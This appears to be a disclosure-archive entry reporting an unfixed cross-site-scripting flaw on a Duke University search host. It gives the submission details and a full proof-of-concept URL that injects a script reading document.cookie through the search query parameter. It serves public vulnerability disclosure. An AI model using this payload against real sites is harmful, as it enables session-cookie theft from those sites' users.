Security researcher Johnjuan728, has submitted on 14/09/2007 a cross-site-scripting (XSS) vulnerability affecting google.oit.duke.edu, which at the time of submission ranked 7750 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 14/09/2007 |
Date published: 16/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Johnjuan728 |
Domain: google.oit.duke.edu |
Category: XSS |
Pagerank: 7750 |
URL: http://google.oit.duke.edu/search?entqr=0&access=p&output=xml_no_dtd&sa=Search+Duke&sort=date%3AD%3A L%3Ad1&ie=UTF-8&btnG=Search&client=duke_collection&q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript% 3E&sitesearch=duke.edu&ud=1&site=duke_collection&oe=UTF-8&proxystylesheet=duke_collection&ip=72.155. 149.227&filter=p |
Click here to view the mirror
|
|
|